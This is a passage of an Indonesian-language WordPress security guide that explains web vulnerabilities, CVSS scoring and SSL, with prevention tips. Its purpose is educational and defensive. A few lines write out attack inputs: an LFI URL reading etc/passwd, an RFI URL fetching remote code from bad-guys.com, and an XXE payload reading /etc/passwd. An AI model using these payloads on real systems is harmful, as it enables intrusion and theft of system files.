9. Kerentanan Pemalsuan Permintaan Sisi Server

Kerentanan SSRF atau Server-Site Request Forger memungkinkan penyerang mengelabui aplikasi sisi server untuk membuat permintaan HTTP ke domain arbitrer yang mereka pilih.

Contoh Pemalsuan Permintaan Sisi Server

Kerentanan SSRF dapat dieksploitasi untuk melakukan serangan Skrip Lintas Situs Tercermin. Penyerang dapat mengambil skrip berbahaya dari bad-guys.com dan menyajikannya kepada semua pengunjung situs web.

Cara Mencegah Pemalsuan Permintaan Sisi Server

Langkah pertama untuk mengurangi kerentanan SSRF adalah memvalidasi input. Misalnya, jika server Anda bergantung pada URL yang disediakan pengguna untuk mengambil file yang berbeda, Anda harus memvalidasi URL dan hanya mengizinkan host target yang Anda percayai.

Untuk informasi lebih lanjut tentang pencegahan SSRF, lihat lembar contekan OWASP.

10. Kerentanan Eskalasi Hak Istimewa

Kerentanan Privilege Eskalasi memungkinkan penyerang untuk menjalankan tugas yang biasanya memerlukan hak istimewa tingkat yang lebih tinggi.

Contoh Eskalasi Hak Istimewa

Dalam Roundup Kerentanan WordPress November 2020 kami, kami melaporkan kerentanan eskalasi hak istimewa yang ditemukan di plugin Ultimate Member (Kerentanan telah ditambal di versi 2.1.12).

Penyerang dapat menyediakan parameter larik untuk meta pengguna wp_capabilities yang mendefinisikan peran pengguna. Selama proses pendaftaran, detail pendaftaran yang dikirimkan diteruskan ke fungsi update_profile , dan setiap metadata yang dikirimkan, terlepas dari apa yang dikirimkan, akan diperbarui untuk pengguna yang baru terdaftar itu.

Kerentanan pada dasarnya memungkinkan pengguna baru untuk meminta administrator saat mendaftar.

Cara Mencegah Eskalasi Hak Istimewa

iThemes Security Pro dapat membantu melindungi situs web Anda dari Kontrol Akses Rusak dengan membatasi akses admin ke daftar Perangkat Tepercaya.

11. Kerentanan Eksekusi Kode Jarak Jauh

Kerentanan RCE atau Remote Code Execution memungkinkan penyerang mengakses dan membuat perubahan dan bahkan mengambil alih komputer atau server.

Contoh Eksekusi Kode Jarak Jauh

Pada tahun 2018, Microsoft mengungkapkan kerentanan eksekusi kode jarak jauh yang ditemukan di Excel.

Penyerang yang berhasil mengeksploitasi kerentanan dapat menjalankan kode arbitrer dalam konteks pengguna saat ini. Jika pengguna saat ini masuk dengan hak pengguna administratif, penyerang dapat mengambil alih sistem yang terpengaruh. Penyerang kemudian dapat menginstal program; melihat, mengubah, atau menghapus data; atau buat akun baru dengan hak pengguna penuh. Pengguna yang akunnya dikonfigurasi untuk memiliki lebih sedikit hak pengguna pada sistem dapat terpengaruh lebih sedikit daripada pengguna yang beroperasi dengan hak pengguna administratif.

Cara Mencegah Eksekusi Kode Jarak Jauh

Cara termudah untuk mengurangi kerentanan RCE adalah dengan memvalidasi input pengguna dengan memfilter dan menghapus karakter yang tidak diinginkan.

Perusahaan induk kami Liquid Web, memiliki artikel bagus tentang mencegah eksekusi kode jarak jauh.

14. Kerentanan Penyertaan File

Kerentanan File Inclusion terjadi ketika aplikasi web memungkinkan pengguna untuk mengirimkan input ke dalam file atau mengunggah file ke server.

Ada dua jenis kerentanan inklusi file, Lokal dan Jarak Jauh.

15. Kerentanan Penyertaan File Lokal

Kerentanan LFI atau Penyertaan File Lokal memungkinkan penyerang membaca dan terkadang mengeksekusi file di server situs web.

Contoh Penyertaan File Lokal

Mari kita lihat lagi yourfavesite.com , di mana jalur yang dilewati untuk include pernyataan tidak dibersihkan dengan benar. Sebagai contoh, mari kita lihat URL di bawah ini.

 yourfavesite.com/module.php?file=example.file

Penyerang dapat mengubah parameter URL untuk mengakses file arbitrer di server.

 yourfavesite.com/module.php?file=etc/passwd

Mengubah nilai file di URL dapat memungkinkan penyerang melihat konten file psswd.

Cara Mencegah Penyertaan File Lokal

Buat daftar file yang diizinkan yang mungkin disertakan halaman, lalu gunakan pengenal untuk mengakses file yang dipilih. Dan kemudian blokir permintaan apa pun yang berisi pengenal yang tidak valid.

16. Kerentanan Penyertaan File Jarak Jauh

Kerentanan RFI atau Penyertaan File Jarak Jauh memungkinkan penyerang memasukkan file, biasanya mengeksploitasi mekanisme "penyertaan file dinamis" yang diterapkan dalam aplikasi target.

Contoh Penyertaan File Jarak Jauh

Plugin WordPress WP dengan Spritz ditutup di repositori WordPress.org karena memiliki kerentanan RFI.

Di bawah ini adalah kode sumber kerentanan:

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

Kode dapat dieksploitasi dengan mengubah nilai content.filter.php?url= value. Sebagai contoh:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

Pencegahan Penyertaan File Jarak Jauh

Buat daftar file yang diizinkan yang mungkin disertakan halaman, lalu gunakan pengenal untuk mengakses file yang dipilih. Dan kemudian blokir permintaan apa pun yang berisi pengenal yang tidak valid.

17. Kerentanan Traversal Direktori

Kerentanan Directory Traversal atau File Traversal memungkinkan penyerang membaca file arbitrer di server yang menjalankan aplikasi.

Contoh Traversal Direktori

WordPress versi 5.7 – 5.03 rentan terhadap serangan traversal direktori karena gagal memverifikasi data input pengguna dengan benar. Penyerang dengan akses ke akun dengan setidaknya hak author dapat mengeksploitasi kerentanan traversal direktori dan mengeksekusi kode PHP berbahaya di server yang mendasarinya, yang mengarah ke pengambilalihan jarak jauh penuh.

Bagaimana Mencegah Traversal Direktori

Pengembang dapat menggunakan indeks daripada bagian sebenarnya dari nama file saat membuat templat atau menggunakan file bahasa.

18. Kerentanan Pengalihan Berbahaya

Kerentanan Pengalihan Berbahaya memungkinkan penyerang menyuntikkan kode untuk mengalihkan pengunjung situs ke situs web lain.

Contoh Pengalihan Berbahaya

Katakanlah Anda sedang mencari sweter biru menggunakan alat pencarian di butik online.

Sayangnya, server butik gagal menyandikan input pengguna dengan benar, dan penyerang dapat menyuntikkan skrip pengalihan berbahaya ke kueri penelusuran Anda.

Jadi, ketika Anda mengetik sweter biru ke dalam bidang pencarian butik dan menekan enter, Anda akan berakhir di halaman web penyerang, bukan halaman butik dengan sweter yang cocok dengan deskripsi pencarian Anda.

Cara Mencegah Pengalihan Berbahaya

Anda dapat melindungi dari pengalihan berbahaya dengan membersihkan input pengguna, memvalidasi URL, dan mendapatkan konfirmasi pengunjung untuk semua pengalihan di luar situs.

19. Kerentanan Entitas Eksternal XML

Kerentanan XXE atau XML Entitas Eksternal memungkinkan penyerang mengelabui parser XML agar menyampaikan informasi sensitif ke entitas eksternal di bawah kendali mereka.

Contoh Entitas Eksternal XML

Penyerang dapat mengeksploitasi kerentanan XXE untuk mendapatkan akses ke file sensitif seperti etc/passwd, yang menyimpan informasi akun pengguna.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

Bagaimana Mencegah Entitas Eksternal XML

Cara terbaik untuk mencegah XXE adalah dengan menggunakan format data yang tidak terlalu rumit seperti JSON dan menghindari serialisasi data sensitif.

20. Serangan Denial of Service

Serangan DoS atau Denial-of-Service adalah upaya yang disengaja untuk membuat situs web atau aplikasi Anda tidak tersedia bagi pengguna dengan membanjirinya dengan lalu lintas jaringan.

Dalam serangan DDoS Distributed Denial of Service, penyerang menggunakan banyak sumber untuk membanjiri jaringan dengan lalu lintas. Penyerang akan membajak sekelompok komputer, router, dan perangkat IoT yang terinfeksi malware, untuk meningkatkan arus lalu lintas.

Contoh Serangan Denial of Service

Serangan DDoS (Distributed Denial-of-Service) terbesar yang pernah ada dilakukan terhadap AWS pada bulan Februari tahun ini. Amazon melaporkan bahwa AWS Shield, layanan perlindungan ancaman terkelola mereka, mengamati dan mengurangi serangan DDoS besar ini. Serangan itu berlangsung selama 3 hari dan mencapai puncaknya pada 2,3 Terabyte per detik.

Cara Mencegah Serangan Denial of Service

Ada 2 cara utama untuk mengurangi serangan DoS.

1. Beli lebih banyak hosting daripada yang Anda butuhkan. Memiliki sumber daya tambahan dapat membantu Anda mengatasi peningkatan permintaan yang disebabkan oleh serangan DoS.
2. Gunakan firewall tingkat server seperti Cloudflare. Firewall dapat mendeteksi lonjakan lalu lintas yang tidak biasa dan mencegah situs web Anda menjadi kelebihan beban.

21. Pencatatan Keystroke

Keystroke Logging , juga dikenal sebagai keylogging atau keyboard capture, terjadi ketika seorang hacker diam-diam memantau dan mencatat penekanan tombol pengunjung situs web.

Contoh Pencatatan Keystroke

Pada tahun 2017, seorang peretas berhasil menginstal JavaScript berbahaya di server pembuat ponsel cerdas OnePlus.

Dengan menggunakan kode berbahaya, penyerang memantau dan mencatat penekanan tombol pelanggan OnePlus saat mereka memasukkan detail kartu kredit mereka. Peretas mencatat dan mengumpulkan penekanan tombol dari 40.000 pelanggan sebelum OnePlus mendeteksi dan menambal peretasan.

Bagaimana Mencegah logging Keystroke

Perbarui semuanya! Biasanya, penyerang perlu mengeksploitasi kerentanan lain yang ada untuk menyuntikkan keylogger di komputer atau server. Menjaga semuanya diperbarui dengan patch keamanan terbaru akan mencegah peretas memberikan cara mudah untuk menginstal keylogger di situs web atau komputer Anda.

Bonus: Phising

Kerentanan perangkat lunak adalah satu-satunya hal yang coba dieksploitasi oleh peretas dan penjahat dunia maya. Peretas juga menargetkan dan mengeksploitasi manusia. Salah satu metode eksploitasi yang umum adalah Phishing.

Apa itu Phising?

Phishing adalah metode serangan cyber menggunakan email, media sosial, pesan teks, dan panggilan telepon untuk mengelabui korban agar memberikan informasi pribadi. Penyerang kemudian akan menggunakan informasi tersebut untuk mengakses akun pribadi atau melakukan penipuan identitas.

Cara Menemukan Email Phishing

Seperti yang kita pelajari sebelumnya dalam posting ini, beberapa kerentanan memerlukan beberapa jenis interaksi pengguna untuk dieksploitasi. Salah satu cara peretas menipu orang untuk berpartisipasi dalam upaya jahat mereka adalah dengan mengirim email phishing.

Mempelajari cara mengenali email phishing dapat menyelamatkan Anda dari bermain-main dengan rencana penjahat dunia maya.

4 tips untuk mengenali email phishing :

1. Lihat alamat email dari – Jika Anda menerima email dari bisnis, bagian alamat email pengirim setelah “@” harus sesuai dengan nama bisnis.
   
   Jika email mewakili perusahaan atau entitas pemerintah tetapi menggunakan alamat email publik seperti “@gmail,” adalah tanda email phishing.
   
   Awasi kesalahan ejaan yang tidak kentara dari nama domain. Sebagai contoh, mari kita lihat alamat email ini [email protected] Kita dapat melihat bahwa Netflix memiliki tambahan “x” di bagian akhir. Kesalahan ejaan adalah tanda yang jelas bahwa email dikirim oleh scammer dan harus segera dihapus.
   
2. Cari kesalahan tata bahasa – Email yang penuh dengan kesalahan tata bahasa adalah tanda email berbahaya. Semua kata dapat dieja dengan benar, tetapi kalimat tidak memiliki kata yang akan membuat kalimat menjadi koheren. Misalnya, “Akun Anda telah diretas. Perbarui kata sandi untuk keamanan akun”.
   
   Semua orang membuat kesalahan, dan tidak setiap email dengan satu atau dua kesalahan ketik adalah upaya untuk menipu Anda. Namun, beberapa kesalahan tata bahasa memerlukan pengamatan lebih dekat sebelum merespons.
   
3. Lampiran atau tautan yang mencurigakan – Sebaiknya berhenti sejenak sebelum berinteraksi dengan lampiran atau tautan apa pun yang disertakan dalam email.
   
   Jika Anda tidak mengenali pengirim email, Anda tidak boleh mengunduh lampiran apa pun yang disertakan dalam email karena dapat berisi malware dan menginfeksi komputer Anda. Jika email tersebut mengaku berasal dari bisnis, Anda dapat mencari informasi kontak mereka di Google untuk memverifikasi bahwa email tersebut dikirim dari mereka sebelum membuka lampiran apa pun.
   
   Jika email berisi tautan, Anda dapat mengarahkan mouse ke tautan untuk memverifikasi bahwa URL mengirim Anda ke tempat yang seharusnya.
   
4. Hati-hati dengan permintaan mendesak – Trik umum yang digunakan oleh scammers adalah menciptakan rasa urgensi. Email berbahaya mungkin membuat skenario yang membutuhkan tindakan segera. Semakin banyak waktu yang Anda punya waktu untuk berpikir, semakin besar kemungkinan Anda akan mengidentifikasi permintaan tersebut berasal dari scammer.
   
   Anda mungkin menerima email dari "bos" Anda yang meminta Anda untuk membayar vendor ASAP atau dari bank Anda yang memberi tahu Anda bahwa akun Anda telah diretas dan tindakan segera diperlukan.

Cara Mengukur Tingkat Keparahan Kerentanan WordPress

Ada beberapa jenis kerentanan WordPress, semuanya dengan berbagai tingkat risiko. Beruntung bagi kami, Database Kerentanan Nasional – sebuah proyek dari Institut Sains dan Teknologi Nasional – memiliki kalkulator sistem penilaian kerentanan untuk menentukan risiko kerentanan.

Bagian panduan kerentanan WordPress ini akan membahas metrik dan tingkat keparahan sistem penilaian kerentanan. Meskipun bagian ini sedikit lebih teknis, beberapa pengguna mungkin merasa berguna untuk memperdalam pemahaman mereka tentang bagaimana kerentanan WordPress dan tingkat keparahannya dinilai.

Metrik Sistem Skor Kerentanan WordPress Umum

Persamaan sistem penilaian kerentanan menggunakan tiga set skor yang berbeda untuk menentukan skor keparahan keseluruhan.

1. Metrik Dasar

Grup metrik Dasar mewakili karakteristik kerentanan yang konstan di seluruh lingkungan pengguna.

Metrik Dasar dibagi menjadi dua kelompok, Eksploitasi, dan Dampak.

1.1. Metrik Eksploitasi

Skor eksploitabilitas didasarkan pada seberapa sulit bagi penyerang untuk memanfaatkan kerentanan. Skor dihitung dengan menggunakan 5 variabel yang berbeda.

1.1.1. Vektor Serangan (AV)

Skor vektor serangan didasarkan pada metode di mana kerentanan dieksploitasi. Skor akan lebih tinggi semakin jauh penyerang dapat mengeksploitasi kerentanan.

Idenya adalah bahwa jumlah penyerang potensial akan jauh lebih besar jika kerentanan dapat dieksploitasi melalui jaringan dibandingkan dengan kerentanan yang memerlukan akses fisik ke eksploitasi perangkat.

Semakin banyak penyerang potensial, semakin tinggi risiko eksploitasi, dan oleh karena itu, skor Vektor Serangan yang diberikan pada kerentanan akan lebih tinggi.

1.1.2. Kompleksitas Serangan (AC)

Nilai kompleksitas didasarkan pada kondisi yang diperlukan untuk mengeksploitasi kerentanan. Beberapa kondisi mungkin memerlukan pengumpulan lebih banyak informasi tentang target, keberadaan pengaturan konfigurasi sistem tertentu, atau pengecualian komputasi.

Skor kompleksitas serangan akan semakin tinggi semakin rendah kompleksitas yang dibutuhkan untuk mengeksploitasi kerentanan.

1.1.3. Hak Istimewa Diperlukan (PR)

Skor hak istimewa yang diperlukan dihitung berdasarkan hak istimewa yang harus diperoleh penyerang sebelum mengeksploitasi kerentanan. Kami akan menyelami ini lebih dalam di bagian Authenticated vs Unauthenticated.

Skor akan tertinggi jika tidak ada hak istimewa yang diperlukan.

1.1.4. Interaksi Pengguna (UI)

Skor interaksi pengguna ditentukan berdasarkan apakah kerentanan memerlukan interaksi pengguna untuk dieksploitasi.

Skor akan tertinggi ketika tidak ada interaksi pengguna yang diperlukan bagi penyerang untuk mengeksploitasi kerentanan.

1.1.5. Cakupan

Skor cakupan didasarkan pada kerentanan dalam satu komponen perangkat lunak untuk memengaruhi sumber daya di luar cakupan keamanannya.

Cakupan keamanan mencakup komponen lain yang menyediakan fungsionalitas hanya untuk komponen tersebut, meskipun komponen lain ini memiliki otoritas keamanannya sendiri.

Skor tertinggi ketika perubahan ruang lingkup terjadi.

1.2. Metrik Dampak

Metrik Dampak menangkap efek langsung dari kerentanan yang berhasil dieksploitasi.

1.2.1. Dampak Rahasia (C)

Skor dampak rahasia ini mengukur dampak pada kerahasiaan informasi yang dikelola oleh perangkat lunak yang dieksploitasi.

Skor tertinggi ketika kerugian pada perangkat lunak yang terkena dampak tertinggi.

1.2.2. Integritas (I)

Skor integritas ini didasarkan pada dampak terhadap integritas kerentanan yang berhasil dieksploitasi.

Skor tertinggi ketika konsekuensi dari perangkat lunak yang terkena dampak terbesar.

1.2.3. Ketersediaan (A)

Skor ketersediaan didasarkan pada dampak ketersediaan perangkat lunak yang dieksploitasi.

Skor tertinggi ketika konsekuensi dari komponen yang terkena dampak terbesar.

Skor Dasar Perhitungan Skor CVSS

Skor Dasar adalah fungsi dari persamaan sub skor Dampak dan Eksploitasi. Dimana skor Dasar didefinisikan sebagai,

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. Metrik Skor Temporal

Metrik Temporal mengukur status teknik eksploitasi saat ini, keberadaan patch atau solusi apa pun, atau keyakinan yang dimiliki seseorang dalam deskripsi kerentanan.

Metrik temporal diharapkan dan akan berubah seiring waktu.

2.1. Exploit Code Maturity (E)

Kematangan kode eksploitasi didasarkan pada kemungkinan kerentanan diserang.

Semakin mudah suatu kerentanan dapat dieksploitasi, semakin tinggi skor kerentanannya.

2.2. Tingkat Remediasi (RL)

Remediasi Tingkat kerentanan merupakan faktor penting untuk diprioritaskan. Pemecahan masalah atau hotfix mungkin menawarkan perbaikan sementara hingga patch atau upgrade resmi dikeluarkan.

Semakin tidak resmi dan permanen perbaikannya, semakin tinggi skor kerentanannya.

2.3. Laporan Keyakinan (RC)

Metrik Report Confidence mengukur tingkat kepercayaan bahwa ada kerentanan dan kredibilitas detail teknis.

Semakin banyak kerentanan divalidasi oleh vendor atau sumber tepercaya lainnya, semakin tinggi skornya.

Perhitungan Skor CVSS Temporal

Skor Temporal didefinisikan sebagai,

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. Metrik Skor Lingkungan

Metrik Lingkungan memungkinkan analis untuk menyesuaikan skor CVSS berdasarkan pentingnya aset TI yang terpengaruh.

Metrik Eksploitasi dan Dampak Lingkungan adalah ekuivalen yang dimodifikasi dari metrik Dasar dan diberi nilai berdasarkan penempatan komponen infrastruktur organisasi. Lihat bagian Metrik Dasar di atas untuk melihat nilai dan deskripsi metrik Daya Eksploitasi dan Dampak.

Metrik Lingkungan berisi grup tambahan, Pengubah Subskor Dampak.

3.1. Metrik Pengubah Subscore Dampak

Metrik Pengubah Subscore Dampak menilai persyaratan keamanan khusus untuk Kerahasiaan (CR), Integritas (IR), dan Ketersediaan (AR), yang memungkinkan skor lingkungan untuk disesuaikan dengan lingkungan pengguna.

Perhitungan Skor CVSS Lingkungan

Skor lingkungan didefinisikan sebagai,

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

Skor & Keparahan CVSS keseluruhan

Sistem Skor Kerentanan Umum Keseluruhan atau skor CVSS adalah representasi dari skor Basis, Temporal, dan Lingkungan.

Skor CVSS Keseluruhan dapat digunakan untuk memberi Anda gambaran tentang seberapa parah atau serius kerentanan itu.

Contoh Peringkat Keparahan CVSS Dunia Nyata

Dalam Vulnerability Roundup Desember 2020 kami, kami melaporkan kerentanan di plugin Easy WP SMTP. Kerentanan zero-day (kami akan membahas kerentanan zero-day di bagian selanjutnya) memungkinkan penyerang untuk mengendalikan akun Administrator dan dieksploitasi secara liar.

Melihat entri Database Kerentanan Nasional, kita dapat menemukan peringkat keparahan kerentanan WP SMTP.

Mari kita uraikan beberapa hal dari tangkapan layar WP SMTP NVDB di atas.

Skor Dasar : Skor dasar adalah 7,5, yang memberi tahu kami bahwa tingkat keparahan kerentanannya tinggi.

Vektor : Vektor memberi tahu kita bahwa skor didasarkan pada persamaan kerentanan CVSS 3.1 dan metrik yang digunakan untuk menghitung skor.

Berikut adalah bagian metrik dari vektor.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Sekarang mari kita gunakan nilai dan deskripsi Metrik Dasar dari postingan sebelumnya untuk memahami delapan nilai metrik vektor.

1. AV:N – Ini berarti bahwa Vektor Serangan (AV) dari kerentanan adalah Jaringan (N). Dengan kata lain, penyerang hanya membutuhkan akses jaringan untuk mengeksploitasi kerentanan.
2. AC:L – Kompleksitas Serangan (AC) dari kerentanan Rendah (L). Dengan kata lain, skrip kiddie dapat mengeksploitasi kerentanan.
3. PR:N – Privileges Required (PR) yang dibutuhkan untuk mengeksploitasi kerentanan adalah None (N). Jadi, kerentanan tidak memerlukan pengguna yang diautentikasi untuk dieksploitasi. (Kami akan membahas perbedaan antara kerentanan yang Diautentikasi & Tidak Diautentikasi nanti di posting ini.)
4. UI:N – Interaksi Pengguna (UI) yang diperlukan untuk mengeksploitasi kerentanan ini adalah Tidak Ada (N). Jadi, penyerang memiliki sarana untuk mengeksploitasi kerentanan sendiri.
5. S:U – Ini berarti Cakupan (S) kerentanan adalah Tidak Berubah (U). Dalam hal kerentanan ini, komponen rentan dan komponen yang terkena dampak adalah sama.
6. C:H – Dampak Kerahasiaan (C) dari kerentanan Tinggi (H). Ketika kerentanan ini dieksploitasi, itu mengakibatkan hilangnya kerahasiaan total.
7. I:N – Dampak Integritas (I) dari kerentanan ini adalah Tidak Ada (N). Ketika kerentanan dieksploitasi, tidak ada kehilangan integritas atau kepercayaan dari informasi yang rentan.
8. A:N – Artinya Dampak Ketersediaan (A) adalah Tidak Ada (N). Ketika kerentanan dieksploitasi, tidak akan ada dampak pada ketersediaan situs web Anda.

Skor CVSS dapat membantu kami menentukan tingkat keparahan dan cakupan kerentanan yang diberikan. Dalam beberapa bagian berikutnya, kami akan membahas beberapa istilah kerentanan penting yang sering disertakan dalam pengungkapan kerentanan.

Membungkus

Di bagian ini, kami mempelajari beberapa elemen penting dari keamanan WordPress, termasuk motivasi peretas, berbagai jenis peretasan, kerentanan yang dieksploitasi oleh penjahat online, cara mengurangi risiko kerentanan, dan cara menentukan risiko yang ditimbulkan kerentanan pada Anda. situs web.

Memahami bagaimana penyerang mencoba meretas situs web kami dan tujuan mereka setelah melanggar situs web kami memungkinkan kami untuk membangun pertahanan yang tepat.

Di bagian yang akan datang, Anda akan mempelajari bagaimana Anda dapat melindungi situs web Anda dari hampir semua jenis serangan yang dapat dilakukan peretas kepada Anda.

Bagian 4: Mengamankan Server Anda

Langkah pertama dalam strategi keamanan WordPress Anda adalah mengamankan server Anda. Server Anda menyimpan semua file dan kode yang membuat situs web Anda berjalan.

Di bagian ini Anda akan belajar:

1. Pentingnya memilih tuan rumah yang baik.
2. Cara mengenkripsi komunikasi di situs web Anda.
3. Bagaimana firewall dapat membantu mengamankan situs Anda.

Pilih Hosting yang Tepat

Tidak semua host web dibuat sama dan memilih satu hanya berdasarkan harga dapat membuat Anda jauh lebih mahal dalam jangka panjang dengan masalah keamanan WordPress. Sebagian besar lingkungan hosting bersama aman, tetapi beberapa tidak cukup memisahkan akun pengguna.

Host Anda harus waspada dalam menerapkan patch keamanan terbaru dan mengikuti praktik terbaik keamanan WordPress hosting penting lainnya yang terkait dengan keamanan server dan file. Host Anda harus waspada dalam menerapkan patch keamanan terbaru dan mengikuti praktik terbaik keamanan hosting penting lainnya yang terkait dengan keamanan server dan file.

Enkripsi Situs WordPress Anda dengan SSL

Secure Sockets Layer, juga dikenal sebagai SSL, adalah teknologi keamanan yang menyediakan enkripsi antara klien dan server web. Untuk memahami ini sedikit lebih sederhana, "klien" adalah browser web seperti Chrome atau Safari, dan "server web" adalah situs web atau toko online Anda.

Cara mudah untuk mengetahui apakah situs web yang Anda kunjungi memiliki sertifikat SSL yang terpasang adalah dengan melihat di bilah alamat browser Anda untuk melihat apakah URL dimulai dengan HTTP atau HTTPS. Jika URL dimulai dengan HTTPS, Anda menjelajahi situs dengan aman menggunakan SSL.

Mengapa SSL Begitu Penting?

Tidak memiliki sertifikat SSL pada tahun 2021 itu mahal. Mengapa? Jika Anda tidak mengaktifkan SSL di situs web Anda, akan lebih sulit bagi calon pelanggan untuk menemukan keberadaan Anda, dan mereka yang menemukan situs Anda mungkin takut memberi Anda uang.

Setiap kali kami melakukan pembelian online, ada komunikasi yang terjadi antara browser Anda dan toko online. Misalnya, ketika kita memasukkan nomor kartu kredit kita ke browser kita, browser kita akan membagikan nomor tersebut dengan toko online. Setelah toko menerima pembayaran, kemudian memberitahu browser Anda untuk memberi tahu Anda bahwa pembelian Anda berhasil.

Satu hal yang perlu diingat tentang informasi yang dibagikan antara browser kami dan server toko adalah bahwa informasi tersebut membuat beberapa pemberhentian dalam transit. SSL menyediakan enkripsi pada komunikasi untuk memastikan bahwa kartu kredit kita tidak terlihat sampai mencapai tujuan akhir dari server toko.

Untuk lebih memahami cara kerja enkripsi, pikirkan tentang bagaimana pembelian kami dikirimkan. Jika Anda pernah melacak status pengiriman pembelian online, Anda akan melihat bahwa pesanan Anda berhenti beberapa kali sebelum tiba di rumah Anda. Jika penjual tidak mengemas pembelian Anda dengan benar, orang akan mudah melihat apa yang Anda beli.

SSL adalah alat penting dalam mencegah orang jahat mencegat informasi sensitif seperti kata sandi dan nomor kartu kredit yang dibagikan antara klien dan server web.

Mengapa Sertifikat SSL Harus Dimiliki untuk Setiap Situs Web?

Manfaat keamanan WordPress yang Anda peroleh dari memiliki sertifikat SSL di situs web Anda sudah cukup untuk membuatnya harus dimiliki oleh situs web mana pun. Namun, untuk mendorong semua orang melindungi pengunjung situs mereka, browser web dan mesin telusur telah menciptakan insentif negatif untuk mendorong semua orang menggunakan SSL. Di bagian ini, kami akan membahas konsekuensi mahal dari tidak mengaktifkan SSL di situs web Anda.

1. Tidak Mengaktifkan SSL Akan Merusak Peringkat SEO Anda

Search Engine Optimization atau SEO adalah proses mengoptimalkan situs web Anda untuk ditemukan secara organik melalui halaman hasil mesin pencari. Manfaat SEO adalah cara terbaik bagi Anda untuk meningkatkan lalu lintas organik dan tidak berbayar ke situs Anda. Jika Anda menjual kursus memanggang roti, Anda ingin situs web Anda berada di halaman pertama hasil pencarian seseorang di Google, atau Duck Duck Go untuk kursus memanggang roti.

Tanpa SSL diaktifkan di situs Anda, mesin pencari akan menghukum Anda dan menurunkan peringkat Anda. Salah satu metrik yang digunakan Google untuk menentukan peringkat situs web dalam hasil pencarian mereka adalah kepercayaan. Adalah kepentingan terbaik Google untuk tidak mengarahkan penggunanya ke situs web yang tidak aman, sehingga kepercayaan sangat ditimbang dalam algoritme peringkat mereka. Dengan SSL menambahkan begitu banyak keamanan, ini adalah bagian penting dari bagaimana Google menilai kepercayaan situs web.

2. Browser Menandai Situs Non-SSL sebagai Tidak Aman

Cara lain tidak mengaktifkan SSL akan dikenakan biaya adalah bahwa browser pengunjung Anda akan memperingatkan mereka bahwa situs Anda tidak aman. Seperti yang telah disebutkan sebelumnya, setelah Anda menginstal sertifikat SSL di situs web Anda, URL situs Anda akan berubah bentuk http: //yourwebsite.com ke https: // yourwebsite / com. Chrome, misalnya, akan menandai laman web terenkripsi HTTPS sebagai aman dengan gembok terkunci. Atau, Chrome akan mengganti gembok terkunci untuk semua laman web yang tidak dienkripsi HTTP dengan teks Not Secure .

Saya tidak akan berbelanja di situs web yang ditandai sebagai tidak aman oleh browser saya, dan saya bukan satu-satunya yang tidak mau. Menurut sebuah studi oleh GlobalSign, 85% pembeli online menghindari situs web yang tidak aman. Perlu diingat, bahwa pada tahun 2021, semua situs Anda harus menggunakan HTTPS dan bukan hanya halaman login dan checkout Anda. Calon pelanggan mungkin tidak dapat melakukan pembayaran yang aman jika halaman toko ditandai sebagai Tidak Aman oleh browser web mereka.

3. Anda Bisa Kehilangan Pelanggan Potensial

Melindungi pelanggan Anda adalah alasan penting untuk mengaktifkan SSL di situs web Anda. Jika mereka bersedia mempercayakan bisnis mereka kepada Anda, paling tidak yang dapat Anda lakukan adalah menghargai kepercayaan itu dengan melindungi mereka dengan kekuatan enkripsi.

Jika seorang peretas dapat mencuri detail kartu kredit pelanggan Anda karena kurangnya enkripsi di situs web Anda, Anda tidak hanya akan kehilangan kepercayaan mereka, tetapi Anda juga akan kehilangan bisnis masa depan mereka.

Bagaimana Saya Dapat Mengetahui Jika Situs Web Saya Memiliki SSL Diaktifkan?

Cara mudah untuk mengetahui apakah situs web Anda memiliki sertifikat SSL yang terpasang adalah dengan melihat di bilah alamat browser Anda untuk melihat apakah URL dimulai dengan HTTP atau HTTPS. Jika URL dimulai dengan HTTPS, situs web Anda diamankan dengan SSL.

Anda juga dapat menggunakan pemeriksa SSL seperti SSL Labs. Pemeriksa SSL akan memindai situs Anda untuk mendapatkan sertifikat SSL dan akan memberi tahu Anda saat sertifikat SSL Anda disetel kedaluwarsa.

Bagaimana Saya Dapat Memasang Sertifikat SSL di Situs WordPress Saya?

Jika situs WordPress Anda kekurangan SSL, hal pertama yang harus Anda lakukan adalah meminta penyedia hosting Anda untuk melihat apakah mereka menyediakan sertifikat dan konfigurasi SSL gratis. Pada tahun 2021, sebagian besar perusahaan hosting menyertakan SSL dalam paket hosting mereka. Misalnya, iThemes Hosting menyediakan dan mengelola SSL untuk setiap situs web.

Jika host Anda tidak memberi Anda sertifikat SSL gratis, jangan khawatir, masih ada banyak opsi lain.

